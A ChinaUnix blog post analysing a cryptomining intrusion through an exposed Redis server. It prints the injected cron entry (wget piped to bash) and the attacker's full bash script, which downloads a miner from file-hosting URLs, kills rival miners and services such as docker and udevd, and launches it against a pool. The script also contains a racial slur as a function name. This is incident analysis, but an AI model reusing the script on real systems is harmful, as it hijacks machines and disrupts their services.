一个黑客挖矿脚本的分析-forgaoqiang-ChinaUnix博客

Chinaunix首页 | 论坛 | 博客

理工小强的ChinaUnix博客

首页　| 　博文目录　| 　关于我

博客访问： 880867
博文数量： 66
博客积分： 10
博客等级：民兵
技术积分： 2071
用户组：普通用户
注册时间： 2012-12-04 15:22

个人简介

从事IT相关工作近10年，获得《网络规划师》《信息系统项目管理师》《系统分析师》、Cisco等认证，对网络和操作系统有较深理解，对认证计费系统和虚拟化技术有深入研究。

文章分类

全部博文（66）

Windows（0）
运维（4）
信息系统项目管理（2）
思维思想（6）
多媒体技术（1）

视频监控（1）
操作系统（3）
程序设计（10）

lua（5）
WEB技术（7）

Javascript（0）

前端设计（2）
黑化技术（3）

编码加解密（1）

WEB前端（1）
路由系统（2）

hotspot（2）

Mikrotik-ROS（0）
Linux（8）

文件系统（1）

shell（1）

C程序设计（2）
数据库和存储（1）

MySQL（1）
计算机网络（15）

认证计费（2）

无线网络（1）

虚拟专网VPN（2）

协议（4）

路由技术（1）

交换技术（1）
虚拟化（4）

docker（1）

docker（1）

Hyper-V（0）

VirtualBox（0）

Xen（0）

桌面虚拟化（1）

Vmware（1）
未分配的博文（0）

文章存档

2019年（4）

2018年（1）

2015年（2）

2014年（16）

2013年（43）

推荐博文

相关博文

一个黑客挖矿脚本的分析

分类：网络与安全

2018-09-28 11:44:29

发现有人利用redis权限写入挖矿脚本

xxx(被入侵的主机):6379> get weaponZ

点击(此处)折叠或打开

"\n*/7 * * * * wget -q -O- --no-check-certificate | bash\n"

点击(此处)折叠或打开

#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin
getLittletrump(){
ARCH=$(uname -i)
if [ "$ARCH" == "x86_64" ]
then
rm -rf /tmp/littletrump*
wget https://pixeldra.in/api/download/VgPwWK --no-check-certificate -O /tmp/littletrump
if [ $? -ne 0 -a $PS2 -eq 0 ];
then
curl -sk https://pixeldra.in/api/download/VgPwWK -o /tmp/littletrump
fi
elif [ "$ARCH" == "i386" ]
then
rm -rf /tmp/littletrump*
wget https://pixeldra.in/api/download/NxQkhz --no-check-certificate -O /tmp/littletrump
if [ $? -ne 0 -a $PS2 -eq 0 ];
then
curl -sk https://pixeldra.in/api/download/NxQkhz -o /tmp/littletrump
fi
else
rm -rf /tmp/littletrump*
wget https://pixeldra.in/api/download/VgPwWK --no-check-certificate -O /tmp/littletrump
if [ $? -ne 0 -a $PS2 -eq 0 ];
then
curl -sk https://pixeldra.in/api/download/VgPwWK -o /tmp/littletrump
fi
fi
}
killNiggiz(){
ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep udevd | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep docker | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep hashvault | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep moneroocean | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep evolutions | grep -v grep | awk '{print $2}' | xargs kill -9
skill -KILL crypto-pool
skill -KILL nanopool
skill -KILL supportxmr
skill -KILL minexmr
skill -KILL dwarfpool
skill -KILL xmrpool
skill -KILL moneropool
skill -KILL xmr
skill -KILL monero
skill -KILL udevs
skill -KILL udevd
skill -KILL docker
skill -KILL hashvault
skill -KILL moneroocean
skill -KILL evolutions
}
killNiggiz
PS2=$(ps aux | grep littletrump | grep -v "grep" | wc -l)
if [ $PS2 -eq 0 ];
then
getLittletrump
fi
chmod +x /tmp/littletrump
chmod 777 /tmp/littletrump
if [ $PS2 -eq 0 ];
then
/tmp/littletrump -o pool.t00ls.ru -k -B
fi

函数名称居然叫做'杀死黑鬼'，而且挖矿程序名称叫做“小川普”感觉是老美的家伙干的，挺猥琐的杀死其他人的挖矿进程，然后启动自己的进程挖矿

阅读(4766) | 评论(0) | 转发(0) |

0

上一篇：PPC架构虚拟主机体验

下一篇：MQTT Essential 细节笔记总结（深入理解MQTT细节）

给主人留下些什么吧！~~

关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们